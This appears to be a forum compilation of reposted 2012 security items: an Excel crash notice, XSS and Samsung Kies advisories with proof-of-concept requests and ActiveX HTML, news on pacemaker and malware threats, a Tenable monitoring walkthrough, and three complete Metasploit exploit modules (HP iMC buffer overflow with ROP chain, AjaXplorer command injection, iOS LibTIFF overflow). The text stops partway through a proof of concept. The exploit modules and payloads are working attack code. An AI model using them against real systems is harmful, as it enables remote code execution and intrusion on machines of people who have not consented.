hathat

Microsoft Office Excel 2010 Crash PoC Title : Microsoft Office Excel 2010 memory corruption Version : Microsoft Office professional Plus 2010 Date : 2012-10-27 Vendor : http://office.microsoft.com Impact : Med/High Contact : coolkaveh [at] rocketmail.com Twitter : @coolkaveh tested : XP SP3 ENG ############################################################################### Bug : ---- memory corruption during the handling of the xls files a context-dependent attacker can execute arbitrary code. ---- ################################################################################ (b4c.1350): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000584 ebx=00135070 ecx=00001000 edx=0000105f esi=06a80800 edi=00000040 eip=301ce0d0 esp=001302f0 ebp=00131d6c iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 *** ERROR: Symbol file could not be found. Defaulted to export symbols for Excel.exe - Excel!Ordinal40+0x1ce0d0: 301ce0d0 668b5008 mov dx,word ptr [eax+8] ds:0023:0000058c=???? ################################################################################ Proof of concept included. Zippyshare.com - POC.rar http://www.exploit-db.com/sploits/22330.rar Sursa Microsoft Office Excel 2010 Crash PoC

Endpoint Protector v4.0.4.2 Multiple Persistent XSS Advisory Name: Multiple Persistent Cross-Site Scripting (XSS) in Endpoint Protector Internal Cybsec Advisory Id: 2012-1029-Multiple Persistent XSS in Endpoint Protector Vulnerability Class: Permanent Cross-Site Scripting (XSS) Release Date: 10/29/2012 Affected Applications: Endpoint Protector v4.0.4.2; other versions may also be affected. Affected Platforms: Any running Endpoint Protector v4.0.4.2 Local / Remote: Remote Severity: High ? CVSS: 5.8 (AV:N/AC:M/Au:NR/C:N/I:P/A:P) Researcher: Juan Manuel Garcia Vendor Status: Acknowedged / Unpatched Reference to Vulnerability Disclosure Policy: http://www.cybsec.com/vulnerability_policy.pdf Vulnerability Description: Multiple Persistent Cross-Site vulnerabilities were found in Endpoint Protector v4.0.4.2 [Virtual Appliance], because the application fails to sanitize the response before it is returned to the user. This can be exploited to execute arbitrary script and HTML code in a user's browser session. This may allow the attacker to steal the user's cookie and to launch further attacks. The parameters "client_device[name]" and "client_device[description]" in /index.php/clientdevice/create are not properly sanitized. The parameters "client_machine[name]", "client_machine[domain]","client_machine[workgroup]" and "client_machine[location]" in /index.php/clientmachine/create are not properly sanitized. The parameter "group[name]" in /index.php/mgroup/create is not properly sanitized. Other parameters might also be affected. Proof of Concept: * The parameter "client_device[name]" in the POST request has been set to: <script>alert(document.cookie)</script> * The parameter "client_device[description]" in the POST request has been set to: <script>alert(1)</script> POST /index.php/clientdevice/create HTTP/1.1 Host: xxx.xxx.xxx.xxx User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:11.0) Gecko/20100101 Firefox/11.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Referer: https://xxx.xxx.xxx.xxx/index.php/ Cookie: place=clientdevice; mark=clientdevice; ratool=d4d3242c4444254d035b7f797738837e Content-Type: multipart/form-data; boundary=--------------------------- 17723440641777718806882422624 Content-Length: 1131 -----------------------------17723440641777718806882422624 Content-Disposition: form-data; name="id" -----------------------------17723440641777718806882422624 Content-Disposition: form-data; name="client_device[department_id]" 1 -----------------------------17723440641777718806882422624 Content-Disposition: form-data; name="client_device[device_type_id]" 1 -----------------------------17723440641777718806882422624 Content-Disposition: form-data; name="client_device[name]" <script>alert(document.cookie)</script> -----------------------------17723440641777718806882422624 Content-Disposition: form-data; name="client_device[description]" <script>alert(1)</script> -----------------------------17723440641777718806882422624 Content-Disposition: form-data; name="client_device[vid]" -----------------------------17723440641777718806882422624 Content-Disposition: form-data; name="client_device[pid]" -----------------------------17723440641777718806882422624 Content-Disposition: form-data; name="client_device[serialno]" -----------------------------17723440641777718806882422624-- Impact: An affected user may unintentionally execute scripts or actions written by an attacker. In addition, an attacker may obtain authorization cookies that would allow him to gain unauthorized access to the application. In this particular case, any user with permission to access the administration console could gain "super admin" privileges by stealing the session cookie of another user with this permission. Vendor Response: 2012/03/27 - Vulnerability was identified 2012/03/29 - Cybsec sent detailed information on the issue and a Proof of Concept to the vendor 2012/04/04 - Vendor confirmed vulnerability (Request ID - 10006599) and stated ?The problems encountered do not represent a significant threat for customers using it because it is usually done with no Internet connection? 2012/04/05 - Vendor stated ?we planned an official release of the new patch to include all the fixes for mentioned vulnerabilities for the date of 18 of September 2012? 2012/09/25 ? Cybsec asked the vendor if the update had been released on the planed date 2012/09/26 ? Vendor stated that he would check the status of the report [Ticket#2012092510000057] 2012/10/03 ? Vendor gave us a new deadline: up to 3-4 months. 2012/10/24 ? Vendor asked if we had published the security advisory 2012/10/24 ? Cybsec stated that the security advisory was going to be published on October 29 2012/10/29 ? Vulnerability was released Contact Information: For more information regarding the vulnerability feel free to contact the researcher at jmgarcia <at> cybsec <dot> com About CYBSEC S.A. Security Systems Since 1996, CYBSEC is engaged exclusively in rendering professional services specialized in Information Security. Their area of services covers Latin America, Spain and over 250 customers are a proof of their professional life. To keep objectivity, CYBSEC S.A. does not represent, neither sell, nor is associated with other software and/or hardware provider companies. Our services are strictly focused on Information Security, protecting our clients from emerging security threats, maintaining their IT deployments available, safe, and reliable. Beyond professional services, CYBSEC is continuously researching new defense and attack techniques and contributing with the security community with high quality information exchange. For more information, please visit www.cybsec.com (c) 2010 - CYBSEC S.A. Security Systems Sursa Endpoint Protector v4.0.4.2 Multiple Persistent XSS

HP Intelligent Management Center UAM Buffer Overflow ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp def initialize(info = {}) super(update_info(info, 'Name' => 'HP Intelligent Management Center UAM Buffer Overflow', 'Description' => %q{ This module exploits a remote buffer overflow in HP Intelligent Management Center UAM. The vulnerability exists in the uam.exe component, when using sprint in a insecure way for logging purposes. The vulnerability can be triggered by sending a malformed packet to the 1811/UDP port. The module has been successfully tested on HP iMC 5.0 E0101 and UAM 5.0 E0102 over Windows Server 2003 SP2 (DEP bypass). }, 'License' => MSF_LICENSE, 'Author' => [ 'e6af8de8b1d4b2b6d5ba2610cbf9cd38', # Vulnerability discovery 'sinn3r', # Metasploit module 'juan vazquez' # Metasploit module ], 'References' => [ ['OSVDB', '85060'], ['BID', '55271'], ['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-171'] ], 'Payload' => { 'BadChars' => "\x00\x0d\x0a", 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff", # Stack adjustment # add esp, -3500 'Space' => 3925, 'DisableNops' => true }, 'Platform' => ['win'], 'Targets' => [ [ 'HP iMC 5.0 E0101 / UAM 5.0 E0102 on Windows 2003 SP2', { 'Offset' => 4035, } ] ], 'Privileged' => true, 'DisclosureDate' => 'Aug 29 2012', 'DefaultTarget' => 0)) register_options([Opt::RPORT(1811)], self.class) end def junk(n=4) return rand_text_alpha(n).unpack("V")[0].to_i end def nop return make_nops(4).unpack("V")[0].to_i end def send_echo_reply(operator) packet = [0xF7103D21].pack("N") # command id packet << rand_text(18) packet << [0x102].pack("n") # watchdog command type => echo reply packet << "AAAA" # ip (static to make offset until EIP static) packet << "AA" # port (static to make offset until EIP static) packet << operator # Operator max length => 4066, in order to bypass packet length restriction: 4096 total connect_udp udp_sock.put(packet) disconnect_udp end def exploit # ROP chain generated with mona.py - See corelan.be rop_gadgets = [ 0x77bb2563, # POP EAX # RETN 0x77ba1114, # <- *&VirtualProtect() 0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN junk, 0x77bb0c86, # XCHG EAX,ESI # RETN 0x77bc9801, # POP EBP # RETN 0x77be2265, # ptr to 'push esp # ret' 0x77bb2563, # POP EAX # RETN 0x03C0990F, 0x77bdd441, # SUB EAX, 03c0940f (dwSize, 0x500 -> ebx) 0x77bb48d3, # POP EBX, RET 0x77bf21e0, # .data 0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN 0x77bbfc02, # POP ECX # RETN 0x77bef001, # W pointer (lpOldProtect) (-> ecx) 0x77bd8c04, # POP EDI # RETN 0x77bd8c05, # ROP NOP (-> edi) 0x77bb2563, # POP EAX # RETN 0x03c0984f, 0x77bdd441, # SUB EAX, 03c0940f 0x77bb8285, # XCHG EAX,EDX # RETN 0x77bb2563, # POP EAX # RETN nop, 0x77be6591, # PUSHAD # ADD AL,0EF # RETN ].pack("V*") bof = rand_text(14) bof << rop_gadgets bof << payload.encoded bof << "C" * (target['Offset'] - 14 - rop_gadgets.length - payload.encoded.length) bof << [0x77bb0c86].pack("V") # EIP => XCHG EAX,ESI # RETN # from msvcrt.dll bof << [0x77bcc397].pack("V") # ADD EAX,2C # POP EBP # RETN # from msvcrt.dll bof << [junk].pack("V") # EBP bof << [0x77bcba5e].pack("V") # XCHG EAX,ESP # RETN # from msvcrt.dll print_status("Trying target #{target.name}...") send_echo_reply(rand_text(20)) # something like... get up! ? send_echo_reply(bof) # exploit end end Sursa HP Intelligent Management Center UAM Buffer Overflow

Researcher Demonstrates Lethal Medical Device Exploit Noted security researcher Barnaby Jack has dealt another blow to medical device insecurity with an exploit that shows how attackers could hack communications terminals for pacemakers and implanted cardioverter-defibrillators (ICDs) to administer potentially lethal jolts. In a shocking presentation at the BreakPoint Security Conference in Melbourne this week, Jack demonstrated how a malicious actor could reverse-engineer elements of a device’s wireless transmitter terminal and rewrite firmware from as close as thirty feet away using only a laptop, then deliver high voltage blasts which could result in fatality for the intended target. “With a max voltage of 830 volts, it’s not hard to see why this is a fairly deadly feature. Not only could you induce cardiac arrest, but you could continually recharge the device and deliver shocks on loop,” Jack was quoted as saying of the exploit Jack also discovered that, due to a lack of authentication protocols in the systems that control wireless communications with the devices, self-propagating malware could be designed to cause a chain of infections between compromised devices within close proximity of one another. “The worst case scenario that I can think of, which is 100 percent possible with these devices, would be to load a compromised firmware update onto a programmer and … the compromised programmer would then infect the next pacemaker or ICD and then each would subsequently infect all others in range,”Jack explained. At last year’s Hacker Halted conference in Miami, Jack similarly conducted the exploit of an implanted insulin pump. The demonstration was a followup to Jay Radcliffe’s August hack of an insulin pump at the Black Hat Conference in Las Vegas, but with a twist; where Radcliff had the advantage of knowing the targeted unit’s model type and serial numbers to conduct the attack, Jack was able to use an off-the-shelf antenna and receiver assembly to remotely scan for the information on the targeted device. After using the antenna to locate and isolate the target, Jack proceeded instruct the unit to deliver a potentially lethal dose of insulin, as well as showing how he could switch the device off entirely. For both exploits, the researcher has declined to publicly provide details on the targeted devices such as the manufacturer or model types for security reasons The point of the exploits, Jack says, is to encourage medical device producers to take the necessary precautions in design and implementation to protect users from the possibility of harm at the hands of miscreants. Sursa: http://www.securitybistro.com/blog/?p=2794

Monitoring the Life of a Java Zero-Day Exploit with Tenable USM Not too long ago, CVE-2012-4681 (US-CERT Alert TA12-240A and Vulnerability Note VU #636312) was issued for a flaw discovered in Oracle Java (JDK and JRE 7 U6 and before), as well as version 6 U34 and before. This is a client-side vulnerability, which requires a user to initiate activity to be exploited. I will avoid dissecting the flaw in detail, as this information is widely available on the Web (a particularly good write-up is here). Keep in mind that Java is platform independent, and so is this exploit. The example here uses Internet Explorer on Windows 7 (with Java SE 7u3). However, Linux and OS X users shouldn’t feel excluded on this one! With Tenable’s SecurityCenter (SC), combined with PVS and LCE, we can track this exploit from start to finish. This solution is known as Tenable USM, or Unified Security Monitoring. The system design used here involves an attacker using Metasploit on Linux (augusta - 192.168.2.7), the client running Windows 7 (brunswick - 192.168.7.9), PVS monitoring both subnets with real-time syslog events enabled and sent to LCE, and SecurityCenter tying it all together for analysis. First, let’s start Metasploit and prepare the exploit reverse TCP handler with payload: Now, before we even start exploit activity, it is important to note that PVS has already detected through passive analysis that the Windows 7 workstation is using a vulnerable version of Java. Here we see the output in SC showing what was sniffed on the wire: The next step is to go to our Windows 7 workstation and launch a Web browser. Here we will point the URL to the exploit server we just started in Metasploit (http://192.168.2.7:8080): The user only sees a blank page, but something far more interesting is going on in the background. This is what the attacker sees: The session has been completed, and now we can take over the system using Meterpreter. Let’s start the shell and poke around. Since this exploit is now successfully launched, we can even download files from the victim: None of this is going unseen, however. A quick view of the LCE traffic gathered for the Windows 7 workstation in SecurityCenter shows a suspicious spike for many different event types during this process: Drilling down further, we can take advantage of Tenable USM’s ability to see all. Since we have PVS sending real-time data to LCE, we are immediately notified of exactly what the victim did to get into this situation; specifically, the “PVS-Web_Request” normalized event. Here is a snippet of the raw log data on this particular session: As you can see, the URI request for “/Exploit.jar” is something to cause alarm. If we switch over to the ‘Vulnerabilities’ tab in SecurityCenter, we can also see that PVS plugin #7 for “Internal encrypted sessions” shows some very helpful information: Setting up alerts and dashboards that keep us aware of any activity like this can help immediately discover that something bad has happened. There are many more ways our software can aid with the discovery and analysis of security events and vulnerabilities. Hopefully, this example gives you a better idea of just what you can do with Tenable products to keep your organization safe and aware. Sursa Tenable Network Security: Monitoring the Life of a Java Zero-Day Exploit with Tenable USM Poate nu e cea mai potrivita sectiune, dar imi pare util.

Android adware, Zitmo botnets and Romanian hackers, oh my! 09 October 2012 We're not in Kansas anymore: The third quarter of 2012 saw a marked increase in Android adware, while new evidence surfaced suggesting that the Zeus-in-the-Mobile (Zitmo) banking trojan is evolving into a botnet. And, Romanian hackers are continuing to perform large-scale scanning for web vulnerabilities, according to the quarterly threat assessment from Fortinet. Fortinet's breakdown of the hacker Yellow Brick Road, as it were, begins with adware for Android is on the rise, which places unwanted advertisements in a mobile device’s status bar, tracks users via their International Mobile Equipment Identity (IMEI) numbers and drops icons on the device’s desktop. To be sure, the percentages are still small overall (the two primary adware variants, Android/NewyearL and Android/Plankton, were detected by close to 1% of all FortiGuard monitoring systems in the APAC and EMEA regions and 4% in the Americas), but with a volume of activity comparable to infamous spam-generator Netsky.PP, it’s enough to take notice. “The surge in Android adware can most likely be attributed to users installing on their mobile devices legitimate applications that contain the embedded adware code,” said Guillaume Lovet, senior manager of Fortinet's FortiGuard Labs Threat Response Team. “It suggests that someone or some group is making money, most likely from rogue advertising affiliate programs.” Consumers can identify these types of applications because they require too many unnecessary permissions for a normal application, “indicating it has a hidden agenda,” said Lovet. For best practices, FortiGuard Labs recommends paying close attention to the rights asked by the application at the point of installation. Red flags include asking permission to access parts of the device that are irrelevant to the application, like the device’s browser history and bookmarks, contact data and phone logs, identity information and system log files. And to be completely on the safe side, users should only download mobile applications that have been highly rated and reviewed. Meanwhile, FortiGuard researchers have discovered that the Zitmo banking bug has evolved into a more complex, botnet-like threat, with new versions recently released for Android and Blackberry. Zitmo is the notorious mobile component of the Zeus banking Trojan – discovered in June 2012 after circulating on the Symbian platform for a couple of years. The new versions for Android and Blackberry have now added botnet-like features, such as enabling cybercriminals to control the Trojan via SMS commands. Zitmo is used by cybercriminals in tandem with the traditional Zeus keylogging malware on PCs to steal the victim’s banking credentials and ultimately their money. Zitmo is used to intercept SMS messages containing the two-factor authentication credentials that banks use to validate the identity of the account holder when logging in. Now, there is evidence that a botnet strategy is the next wave of evolution for the virus. “The new version of Zitmo may already be in the wild in Europe and Asia," said Lovet. “While we’re detecting only a few instances of the malware in those regions, it’s leading us to believe the code is currently being tested by its authors or deployed for very specific, targeted attacks.” On a related note, Fortinet researchers also recently found a new Android malware in the wild in France, which poses as a Flash Player installer and steals incoming SMS messages by forwarding them to a remote server. Fortinet has dubbed it Android/Fakelash.A!tr.spy. “Contrary to many Android malware which are downloaded from underground or legitimate marketplaces, this one is propagating via a link in a SMS,” said Fortinet researcher Axelle Apvrille, in the company blog. “For example, the victim below complains he received an SMS from 10052 saying, ‘For proper function of your device, please download the new ANDROID Flash update at this link: http://tinyurl.com/xxxxx’.” As more banks and online merchants roll out two-factor authentication ? usually through the use of an SMS code to bring the second authentication factor and confirm a transaction ? Android and Blackberry users should be mindful anytime their financial institution asks them to install software onto their computing device, “as this is something banks rarely if ever request from their customers,” Lovet noted. For complete security, FortiGuard Labs recommends conducting online banking from the original operating system CD. If that is not an option, users should at the very least install an anti-virus client on their phone and desktop PCs and make sure they are updated with the latest patches. Meanwhile, Fortinet also has detected large scale scans for vulnerability emanating from Eastern Europe. These scans were performed through a tool developed by Romanian hackers to seek web servers running vulnerable versions of the mySQL administration software (phpMyAdmin) in order to take control of those servers. The tool, called ZmEu, contains code strings in the payload that refers to AntiSec, the global hacking movement initiated by Anonymous and Lulzsec last year that targets banks and government departments. The scans are being performed around the world, and in September, almost 25% of FortiGuard monitoring systems were detecting at least one such scan per day. “The goal behind an attack on this vulnerability is open to speculation,” added Lovet. “But if these hackers are indeed related to AntiSec, possible scenarios include exfiltering sensitive data, using the compromised servers as a direct denial of service (DDoS) launch base or defacing the Websites they’ve infiltrated.” To secure Web servers against this threat, Fortinet recommends updating to the latest version of PhPMyAdmin. Sursa Infosecurity - Android adware, Zitmo botnets and Romanian hackers, oh my!

AjaXplorer checkInstall.php Remote Command Execution ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'AjaXplorer checkInstall.php Remote Command Execution', 'Description' => %q{ This module exploits an arbitrary command execution vulnerability in the AjaXplorer 'checkInstall.php' script. All versions of AjaXplorer prior to 2.6 are vulnerable. }, 'Author' => [ 'Julien Cayssol', #Credited according to SecurityFocus 'David Maciejak', #Metasploit module 'sinn3r' #Final touch on the Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'OSVDB', '63552' ], [ 'BID', '39334' ] ], 'Privileged' => false, 'Payload' => { 'DisableNops' => true, 'Space' => 512, 'Compat' => { 'ConnectionType' => 'find', 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic perl ruby python bash telnet' } }, 'Platform' => ['unix', 'bsd', 'linux', 'osx', 'windows'], 'Arch' => ARCH_CMD, 'Targets' => [[ 'AjaXplorer 2.5.5 or older', { }]], 'DisclosureDate' => 'Apr 4 2010', 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The base path to AjaXplorer', '/AjaXplorer-2.5.5/']) ], self.class) end def check target_uri.path << '/' if target_uri.path[-1,1] != '/' clue = Rex::Text::rand_text_alpha(rand(5) + 5) res = send_request_cgi({ 'method' => 'GET', 'uri' => "#{target_uri.path}plugins/access.ssh/checkInstall.php", 'vars_get' => { 'destServer' => "||echo #{clue}" } }) # If the server doesn't return the default redirection, probably something is wrong if res and res.code == 200 and res.body =~ /#{clue}/ return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def exploit peer = "#{rhost}:#{rport}" target_uri.path << '/' if target_uri.path[-1,1] != '/' # Trigger the command execution bug res = send_request_cgi({ 'method' => 'GET', 'uri' => "#{target_uri.path}plugins/access.ssh/checkInstall.php", 'vars_get' => { 'destServer' => "||#{payload.encoded}" } }) if res print_status("#{peer} - The server returned: #{res.code} #{res.message}") m = res.body.scan(/Received output:\s\[([^\]]+)\]/).flatten[0] || '' if m.empty? print_error("#{peer} - This server may not be vulnerable") else print_status("#{peer} - Command output from the server:") print_line(m) end end end end =begin Repo: http://sourceforge.net/projects/ajaxplorer/files/ajaxplorer/2.6/ =end Sursa AjaXplorer checkInstall.php Remote Command Execution

Apple iOS MobileSafari LibTIFF Buffer Overflow ## # $Id: safari_libtiff.rb 15950 2012-10-09 18:31:08Z rapid7 $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking # # This module acts as an HTTP server # include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, 'Name' => 'Apple iOS MobileSafari LibTIFF Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow in the version of libtiff shipped with firmware versions 1.00, 1.01, 1.02, and 1.1.1 of the Apple iPhone. iPhones which have not had the BSD tools installed will need to use a special payload. }, 'License' => MSF_LICENSE, 'Author' => ['hdm', 'kf'], 'Version' => '$Revision: 15950 $', 'References' => [ ['CVE', '2006-3459'], ['OSVDB', '27723'], ['BID', '19283'] ], 'Payload' => { 'Space' => 1800, 'BadChars' => "", # Multi-threaded applications are not allowed to execve() on OS X # This stub injects a vfork/exit in front of the payload 'Prepend' => [ 0xe3a0c042, # vfork 0xef000080, # sc 0xe3500000, # cmp r0, #0 0x1a000001, # bne 0xe3a0c001, # exit(0) 0xef000080 # sc ].pack("V*") }, 'Arch' => ARCH_ARMLE, 'Targets' => [ [ 'MobileSafari iPhone Mac OS X (1.00, 1.01, 1.02, 1.1.1)', { 'Platform' => 'osx', # Scratch space for our shellcode and stack 'Heap' => 0x00802000, # Deep inside _swap_m88110_thread_state_impl_t() libSystem.dylib 'Magic' => 0x300d562c, } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Aug 01 2006' )) end def on_request_uri(cli, req) # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) # Grab reference to the target t = target print_status("Sending exploit") # Transmit the compressed response to the client send_response(cli, generate_tiff(p, t), { 'Content-Type' => 'image/tiff' }) # Handle the payload handler(cli) end def generate_tiff(code, targ) # # This is a TIFF file, we have a huge range of evasion # capabilities, but for now, we don't use them. # - https://strikecenter.bpointsys.com/articles/2007/10/10/october-2007-microsoft-tuesday # lolz = 2048 tiff = "\x49\x49\x2a\x00\x1e\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x08\x00\x00\x01\x03\x00"+ "\x01\x00\x00\x00\x08\x00\x00\x00\x01\x01\x03\x00"+ "\x01\x00\x00\x00\x08\x00\x00\x00\x03\x01\x03\x00"+ "\x01\x00\x00\x00\xaa\x00\x00\x00\x06\x01\x03\x00"+ "\x01\x00\x00\x00\xbb\x00\x00\x00\x11\x01\x04\x00"+ "\x01\x00\x00\x00\x08\x00\x00\x00\x17\x01\x04\x00"+ "\x01\x00\x00\x00\x15\x00\x00\x00\x1c\x01\x03\x00"+ "\x01\x00\x00\x00\x01\x00\x00\x00\x50\x01\x03\x00"+ [lolz].pack("V") + "\x84\x00\x00\x00\x00\x00\x00\x00" # Randomize the bajeezus out of our data hehe = rand_text(lolz) # Were going to candy mountain! hehe[120, 4] = [targ['Magic']].pack("V") # >> add r0, r4, #0x30 hehe[104, 4] = [ targ['Heap'] - 0x30 ].pack("V") # Candy mountain, Charlie! # >> mov r1, sp # It will be an adventure! # >> mov r2, r8 hehe[ 92, 4] = [ hehe.length ].pack("V") # Its a magic leoplurodon! # It has spoken! # It has shown us the way! # >> bl _memcpy # Its just over this bridge, Charlie! # This magical bridge! # >> ldr r3, [r4, #32] # >> ldrt r3, [pc], r3, lsr #30 # >> str r3, [r4, #32] # >> ldr r3, [r4, #36] # >> ldrt r3, [pc], r3, lsr #30 # >> str r3, [r4, #36] # >> ldr r3, [r4, #40] # >> ldrt r3, [pc], r3, lsr #30 # >> str r3, [r4, #40] # >> ldr r3, [r4, #44] # >> ldrt r3, [pc], r3, lsr #30 # >> str r3, [r4, #44] # We made it to candy mountain! # Go inside Charlie! # sub sp, r7, #0x14 hehe[116, 4] = [ targ['Heap'] + 44 + 0x14 ].pack("V") # Goodbye Charlie! # ;; targ['Heap'] + 0x48 becomes the stack pointer # >> ldmia sp!, {r8, r10} # Hey, what the...! # >> ldmia sp!, {r4, r5, r6, r7, pc} # Return back to the copied heap data hehe[192, 4] = [ targ['Heap'] + 196 ].pack("V") # Insert our actual shellcode at heap location + 196 hehe[196, payload.encoded.length] = payload.encoded tiff << hehe end end Sursa Apple iOS MobileSafari LibTIFF Buffer Overflow

Samsung Kies 2.3.2.12054_20 Multiple Vulnerabilities Advisory ID: HTB23099 Product: Samsung Kies Vendor: Samsung Electronics Vulnerable Version(s): 2.3.2.12054_20 and probably prior Tested Version: 2.3.2.12054_20 Vendor Notification: June 25, 2012 Public Disclosure: October 15, 2012 Vulnerability Type: NULL Pointer Dereference [CWE-476], Improper Access Control [CWE-284], Improper Access Control [CWE-284], Improper Access Control [CWE-284], Improper Access Control [CWE-284] CVE References: CVE-2012-3806, CVE-2012-3807, CVE-2012-3808, CVE-2012-3809, CVE-2012-3810 CVSSv2 Base Scores: 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P), 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P), 5.8 (AV:N/AC:M/Au:N/C:N/I:P/A:P), 5.8 (AV:N/AC:M/Au:N/C:N/I:P/A:P), 5.8 (AV:N/AC:M/Au:N/C:N/I:P/A:P) Solution Status: Fixed by Vendor Risk Level: Medium Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) ----------------------------------------------------------------------------------------------- Advisory Details: High-Tech Bridge Security Research Lab has discovered multiple vulnerabilities in Samsung Kies synchronization utility that allows remote attacker to compromise affected system, execute and modify arbitrary files, modify arbitrary directories and modify System Registry with privileges of the current user. 1) Null Pointer Dereference in Samsung Kies: CVE-2012-3806 The vulnerability exists due to a null pointer dereference error in GetDataTable() method within the Samsung.DeviceService.DCA.DeviceDataParagonATGM.1 ActiveX control (DCAPARAGONGM.dll, GUID {7650BC47-036D-4D5B-95B4-9D622C8D00A4}, located by default in "C:\Program Files(x86)\Samsung\Kies\External\DeviceModules\"). A remote attacker can pass "tagDATATABLE_SUID" argument equal to 0 to the GetDataTable() method and rise an ACCESS_VIOLATION exception on a MOV EDX,[EAX] instruction, as EAX is previously zeroed by an unexpected NULL value in the memory region pointed by ECX: Disassembly: -------------------------------------------------- 2A22B95 MOV ECX,[EBP+10] 2A22B98 MOV EAX,[ECX] 2A22B9A MOV EDX,[EAX] // Crash through Null Pointer Dereference 2A22B9C PUSH 0 2A22B9E PUSH 0 2A22BA0 PUSH 2A71E68 2A22BA5 PUSH EAX 2A22BA6 MOV EAX,[EDX+50] 2A22BA9 CALL EAX Registers: -------------------------------------------------- EIP 02A22B9A EAX 00000000 EBX 02A66774 -> 029E58F0 ECX 0022EBC0 -> 00000000 EDX 006DFCE2 -> 00030000 EDI 00000000 ESI 00000000 EBP 0022EB5C -> 0022EB7C ESP 0022EB38 -> F2D508FE The following Proof of Concept code causes a browser to crash: <html> <!-- (c)oded by Frederic Bourla, High-Tech Bridge --> <head> <title>Multiple vulnerabilities in Samsung Kies v.2.3.2.12054_20</title> </head> <script language='vbscript'> Sub daPoC() arg1=0 daTarget.GetDataTable arg1 End Sub </script> <body> <h3>Multiple vulnerabilities in Samsung Kies v.2.3.2.12054_20</h3> <h4>Null Pointer Dereference PoC</h4> <hr> This simple PoC will crash Internet Explorer.<BR><BR> <input language=VBScript onclick=daPoC() type=button value="Proof of Concept"> </body> <object classid='clsid:7650BC47-036D-4D5B-95B4-9D622C8D00A4' id='daTarget'></object> </html> 2) Arbitrary File Execution in Samsung Kies: CVE-2012-3807 The CmdAgent.dll library, located by default in "C:\Program Files (x86)\Samsung\Kies\External\FirmwareUpdate\", has numerous arbitrary file execution vulnerabilities present in "CmdAgentLib" (GUID: {1FA56F8D-A66E-4ABD-9BC9-6F61469E59AD}), in particular in the 'ICommandAgent' interface of the "CommandAgent" class (GUID: {C668B648-A2BD-432C-854F-C8C0A275E1F1}). This default "ICommandAgent" interface has multiple functions and methods, and most of them can be leveraged by an untrusted source. Arbitrary File Execution: Run => Vulnerable RunAt => Initial Exploit Test failed RunAtNotExit => Initial Exploit Test failed RunNotExit => Vulnerable Arbitrary File Execution Proof of Concept: <html> <!-- (c)oded by Frederic Bourla, High-Tech Bridge --> <head> <title>Multiple vulnerabilities in Samsung Kies v.2.3.2.12054_20</title> </head> <script language='vbscript'> Sub daPoC() daFile="iexplore https://www.htbridge.com/advisory/HTB23099" daTarget.Run daFile End Sub </script> <body> <h3>Multiple vulnerabilities in Samsung Kies v.2.3.2.12054_20</h3> <h4>Arbitrary File Execution PoC</h4> <hr> This simple PoC will spawn IE and display more information about the vulnerability.<BR><BR> <input language=VBScript onclick=daPoC() type=button value="Proof of Concept"> </body> <object classid='clsid:C668B648-A2BD-432C-854F-C8C0A275E1F1' id='daTarget'></object> </html> 3) Arbitrary File Modification in Samsung Kies: CVE-2012-3808 The CmdAgent.dll library, located by default in "C:\Program Files (x86)\Samsung\Kies\External\FirmwareUpdate\", has numerous arbitrary file modification vulnerabilities present in "CmdAgentLib" (GUID: {1FA56F8D-A66E-4ABD-9BC9-6F61469E59AD}), in particular in the 'ICommandAgent' interface of the "CommandAgent" class (GUID: {C668B648-A2BD-432C-854F-C8C0A275E1F1}). This default "ICommandAgent" interface has multiple functions and methods, and most of them can be leveraged by an untrusted source. Arbitrary File Modification: FileCopy => Vulnerable FileCopySync => Vulnerable FileDelete => Vulnerable FileMove => Vulnerable FileMoveExReboot => Initial Exploit Test failed FileMoveSync => Vulnerable Arbitrary File Modification Proof of Concept: <html> <!-- (c)oded by Frederic Bourla, High-Tech Bridge --> <head> <title>Multiple vulnerabilities in Samsung Kies v.2.3.2.12054_20</title> </head> <script language='vbscript'> Set daShell = CreateObject( "WScript.Shell" ) daRoot=daShell.ExpandEnvironmentStrings("%SystemRoot%") daFileCopySource=daRoot & "\System32\drivers\etc\hosts" daProfile=daShell.ExpandEnvironmentStrings("%USERPROFILE%") daFileCopyDest=daprofile & "\Desktop\hosts" daFileMoveDest=daprofile & "\Desktop\hosts.backup" Sub daPoC() daTarget.FileCopy daFileCopySource, daFileCopyDest End Sub 